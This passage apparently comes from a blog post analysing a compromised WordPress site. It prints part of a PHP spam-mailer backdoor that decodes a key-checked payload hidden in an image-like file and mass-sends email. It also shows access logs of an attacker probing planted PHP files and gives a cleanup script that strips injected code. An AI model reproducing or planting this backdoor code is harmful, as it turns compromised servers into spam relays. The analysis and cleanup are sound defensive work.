$j++, $i++) { $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); } } return $out_data; } function type1_send($config_file) { $data = file_get_contents($config_file); $start_pos = strpos($data, myhex2bin(“ffda”)); if ($start_pos) { $start_pos += (20); $end_pos = strrpos($data, myhex2bin(“ffd9”)); if ($end_pos) { $data = substr($data, $start_pos, $end_pos); } else { return FALSE; } } else { return FALSE; } $key = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’]; $data = decode($data, $key); $data = @unserialize($data); if (!$data || !isset($data[‘ak’])) { return FALSE; } if ($data[‘ak’] != “328c9145-576b-4a72-9ef0-5d38810eaf66”) { exit(); } if (isset($data[‘c’])) { $res[“r”][“c”] = $data[‘c’]; return base64_encode(serialize($res)); } $good = 0; $bad = 0; $last_error = 0; foreach ($data[‘e’] as $uid=>$email) { $theme = $data[‘s’][array_rand($data[‘s’])]; $theme = alter_macros($theme); $theme = num_macros($theme); $theme = xnum_macros($theme); $message = $data[‘l’]; $message = alter_macros($message); $message = num_macros($message); $message = xnum_macros($message); $message = fteil_macros($message, $uid); $from = $data[‘f’][array_rand($data[‘f’])]; $from = alter_macros($from); $from = num_macros($from); $from = xnum_macros($from); if (strstr($from, “[CUSTOM]”) == FALSE) { $from = from_host($from); } else { $from = str_replace(“[CUSTOM]”, “”, $from); } $from_email = explode(“<“, $from); $from_email = explode(“>”, $from_email[1]); $from_name = explode(“\””, $from); $last_error = sendSmtpMail($from_email[0], $from_name[1], $email, $theme, $message, $data[‘lt’], $config_file); if ($last_error === 0) { $good++; } else { $bad++; $good = count($data[‘e’]) – $bad; } } $res[“r”][“e”] = $last_error === FALSE ? 0 : $last_error; $res[“r”][“g”] = $good; $res[“r”][“b”] = $bad; return base64_encode(serialize($res)); }
Some log to explain the initialization steps:
146.185.239.53 - - [05/Feb/2015:10:26:20 +0100] "POST /wp-content/themes/Avada/framework/plugins/envato-wordpress-toolkit-library/object.php HTTP/1.1" 200 308 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
146.185.239.53 - - [06/Feb/2015:02:34:41 +0100] "POST /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php HTTP/1.1" 404 18711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4"
146.185.239.53 - - [06/Feb/2015:02:34:44 +0100] "POST /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php HTTP/1.1" 404 18694 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
146.185.239.53 - - [06/Feb/2015:02:34:47 +0100] "POST /wp-content/uploads/wysija/themes/rss.lib.php HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0"
146.185.239.53 - - [06/Feb/2015:02:34:48 +0100] "POST /wp-content/uploads/wysija/themes/rss.lib.php HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
146.185.239.53 - - [06/Feb/2015:02:34:49 +0100] "POST /wp-content/backup-2365b/.title14.php HTTP/1.1" 404 18713 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53"
146.185.239.53 - - [06/Feb/2015:02:34:51 +0100] "POST /wp-content/backup-2365b/.title14.php HTTP/1.1" 404 18738 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
http://whois.domaintools.com/146.185.239.53
Update
A very useful (and easy) script to cleanup your site:
getRealPath();
}
foreach($files as $file){
if ($file) {
$fileArr = file($file);
$hack_pos = strpos($fileArr[0], 'GLOBALS');
if ($hack_pos !== false) {
echo "f: $file\n\n";
$orig_pos = strpos($fileArr[0], '; ?>', $hack_pos);
$first_line = $orig_pos !== false ? substr($fileArr[0], $orig_pos + 4) : '';
$fileArr[0] = $first_line;
file_put_contents($file, join("\n", $fileArr));
}
}
}
?>
